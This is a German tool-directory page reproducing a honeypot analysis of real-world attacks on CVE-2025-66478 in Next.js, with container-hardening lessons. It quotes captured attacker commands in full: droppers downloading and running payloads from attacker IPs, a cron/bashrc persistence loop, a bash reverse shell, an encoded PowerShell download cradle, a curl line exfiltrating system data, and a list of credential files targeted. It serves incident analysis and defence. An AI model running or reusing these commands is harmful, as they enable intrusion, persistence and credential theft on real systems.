Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66478 — Analyse realer Angriffslogs der CVE-2025-66478 (Next.js Server Actions RCE) mit Malware-Beispielen, Verfolgung der Angreifer-IPs und Lektionen zur Härtung der Containersicherheit. | Kitploit
Tools/GitHubGitHub/exptechtw/cve-2025-66478
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationForensikMalware-AnalyseBedrohungsanalyseLernen & BildungIncident Response
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Analyse realer Angriffslogs der CVE-2025-66478 (Next.js Server Actions RCE) mit Malware-Beispielen, Verfolgung der Angreifer-IPs und Lektionen zur Härtung der Containersicherheit.

25vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-66478 - Analyse echter Angriffslogs der Next.js Server Actions RCE-Schwachstelle

Übersicht

Dieses Projekt sammelt echte Angriffslogs, die von einer im Internet freigegebenen Next.js 15.1.2-Anwendung (ausgeführt in einem Docker-Container) aufgezeichnet wurden. Diese Logs zeigen, wie die Schwachstelle CVE-2025-66478 im Feld von massiven automatisierten Angriffstools gescannt und ausgenutzt wird.

Aufzeichnungszeitraum: 2025-12-04 ~ 2025-12-06 (ca. 48 Stunden)

Umgebungsinformationen:

  • Framework: Next.js 15.1.2
  • Ausführungsumgebung: Bun v1.2.20
  • Container: Docker (Alpine Linux)
  • Zeitzone: Asia/Taipei

Angriffstypen-Statistiken

1. Schadprogramm-Download und -Ausführung (Dropper/Downloader)

Angreifer versuchen, über die Schwachstelle Befehle zum Herunterladen und Ausführen von Schadsoftware auszuführen.

Angriffsquell-IPURL der SchadsoftwareBeschreibung
216.158.232.43http://216.158.232.43:12000/sex.shBotnetz/Miner
38.207.161.212http://38.207.161.212/agentSchadsoftware-Agent
43.156.63.124http://43.156.63.124/tsdCron-Hintertür eingesetzt
154.38.121.219res.qiqigece.top/nginx3Als nginx getarnte Schadsoftware
47.79.42.91iot.632313373.xyz/nz.shIoT-Botnetz-Skript
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shMiner/Hintertür
103.135.101.15http://103.135.101.15/wocaosinm.shSchadskript
38.12.24.231http://38.12.24.231/kworkerAls Kernel Worker getarnte Schadsoftware
128.199.194.97http://128.199.194.97:9001/setup2.shInitialisierungsskript

Beispiel für Angriffsbefehle

root@kitploit:~
# Typischer Dropper-Angriff
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Einschleusen einer Cron-Hintertür zur Persistenz
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Komplexer Persistenzangriff (mehrere Download-Methoden + Cron + Bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Reverse Shell

Angreifer versuchen, eine Reverse-Shell-Verbindung herzustellen, um interaktiven Zugriff zu erhalten.

root@kitploit:~
# Bash Reverse Shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell-Angriffe (Fehleinschätzung für Windows)

Angreifer nehmen fälschlicherweise an, dass das Ziel ein Windows-System ist, und versuchen, PowerShell-Befehle auszuführen.

root@kitploit:~
# Base64-kodiertes bösartiges PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Dekodiert:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Mathematische Berechnungen zur Schwachstellenbestätigung
powershell -c "41*271"      # = 11111 (Bestätigungscode)
powershell -c "44225*41002" # = 1814113450

4. Informationssammlung (Information Gathering)

Angreifer versuchen, Systeminformationen für weitere Angriffe zu sammeln.

root@kitploit:~
# Systeminformationen sammeln und exfiltrieren
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Anmeldeinformationsdiebstahl (Credential Harvesting)

Angreifer versuchen, verschiedene sensible Dateien und Anmeldeinformationen auszulesen.

Versuchte sensible Pfade

6. Exfiltration von Umgebungsvariablen

Erfolgreich exfiltrierte Container-Umgebungsvariablen über die Schwachstelle:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS-Exfiltration

Angreifer verwenden DNS-Abfragen zur Datenexfiltration oder Schwachstellenbestätigung:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

Gründe für fehlgeschlagene Angriffe

Die meisten Angriffe scheitern aufgrund der reduzierten Natur von Alpine Linux-Containern:

Fehlendes ToolAuswirkung
curlHerunterladen von Schadsoftware nicht möglich
bash

Obwohl wget verfügbar ist, verlassen sich einige bösartige Skripte intern auf curl oder bash, was zur Fehlausführung führt.


Base64-Decodierungsbeispiele

Die Logs enthalten eine große Menge Base64-kodierter Daten. Nachfolgend einige dekodierte Ergebnisse:

Exfiltration von Systeminformationen

root@kitploit:~
# digest: 'cm9vdAo='
Dekodiert: root

# digest: 'dGVzdAo='
Dekodiert: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Dekodiert: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Dekodiert: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Exfiltration von Verzeichnislisten

root@kitploit:~
# /tmp Verzeichnisinhalt
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Dekodiert:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Angriffsquell-IP-Statistiken

Nachfolgend die aufgezeichneten IP-Adressen der Angriffsquellen:


Angriffsvektoren

Server Action-Aufruf

Angreifer versuchen, nicht existierende Server Actions aufzurufen:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

Informationsleck in Fehlerantworten

Angreifer nutzen das digest-Feld in Fehlermeldungen aus, um Daten zu exfiltrieren:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // Base64-kodiertes 'root'

Wichtige Lehren

1. Best Practices für Containersicherheit

  • Minimale Images: Verwenden Sie schlanke Basis-Images (z.B. Alpine), um die Angriffsfläche zu reduzieren
  • Entfernen unnötiger Werkzeuge: Installieren Sie keine Tools wie curl, bash, python, die missbraucht werden könnten
  • Schreibgeschütztes Dateisystem: Führen Sie Container mit --read-only aus
  • Nicht-Root-Benutzer: Führen Sie die Anwendung als unprivilegierter Benutzer aus

2. Schwachstellenbehebung

  • Aktualisieren Sie Next.js auf eine gepatchte Version
  • Validieren Sie die Eingaben von Server Actions
  • Implementieren Sie WAF-Regeln zur Filterung verdächtiger Anfragen

3. Überwachung und Erkennung

  • Überwachen Sie ungewöhnliche Unterprozessausführungen
  • Überwachen Sie ausgehende Netzwerkverbindungen
  • Überwachen Sie Zugriffsversuche auf sensible Dateien

Haftungsausschluss

Dieses Projekt dient ausschließlich der Sicherheitsausbildung und Forschung. Alle aufgezeichneten Angriffe sind echte Angriffsversuche auf einen Forschungs-Honeypot. Verwenden Sie diese Informationen nicht für illegale Zwecke.


Malware-Beispiele

Dieses Projekt enthält echte Malware-Beispiele, die aus den Angriffslogs extrahiert und heruntergeladen wurden. Eine detaillierte Analyse finden Sie unter:

malware_samples/ANALYSIS.md

Erhaltene Proben

Zusammenfassung der Angriffsmethoden

  1. nz.sh - Installation des Nezha-Überwachungsagenten zur Fernüberwachung des kompromittierten Hosts
  2. tsd.sh + tsd - Mehrere Persistenzmechanismen (Cron + systemd + rc.local)
  3. init.sh + agent - Vollständiges Hintertür-Framework mit Unterstützung für mehrere Systeme, automatischem Neustart und Protokollierung

Verwandte Ressourcen

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

Lizenz

MIT License

Tool herunterladen
KategoriePfad
Cloud-Anmeldedaten/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH-Schlüssel/root/.ssh/id_rsa, /root/.ssh/config
Git-Anmeldedaten/root/.git-credentials, /root/.gitconfig
Container/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Anwendungen/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Shell-Verlauf/root/.bash_history, /root/.zsh_history
Cloud-Tools/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Systemkonfiguration/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
Ausführung bash-spezifischer Syntax (z.B. Reverse Shell) nicht möglich
powershellWindows-Angriffe unwirksam
pythonPython-Downloader nicht nutzbar
IP-AdresseLand/Region (vermutet)Angriffstyp
216.158.232.43USADropper
38.165.44.205USADropper
23.95.44.80USADropper
154.38.121.219HongkongMalware (nginx3)
38.207.161.212USAAgent
43.156.63.124ChinaCron-Hintertür
47.79.42.91China (Alibaba Cloud)IoT-Botnetz
47.79.65.237China (Alibaba Cloud)Miner
119.45.243.154China (Tencent Cloud)Miner
144.22.210.54BrasilienDropper
217.60.249.228SchwedenDropper
154.26.192.32USAReverse Shell
156.234.209.103UnbekanntPowerShell-Payload
38.60.212.106USAInformationssammlung
103.135.101.15VietnamBotnetz
128.199.194.97Singapur (DigitalOcean)Setup-Skript
38.12.24.231USAPersistente Schadsoftware
DateiTypGrößeQuelleBedrohungsstufe
nz.shShell-Skript931 Biot.632313373.xyzMittel
tsd.shShell-Skript1.7 KB43.156.63.124Hoch
tsdELF 64-bit6.8 MB43.156.63.124Hoch
init.shShell-Skript6.1 KBAWS S3Kritisch
agentELF 64-bit23.7 MBAWS S3Kritisch
Agtisx.exePE32+ (Windows)24.0 MBAWS S3Kritisch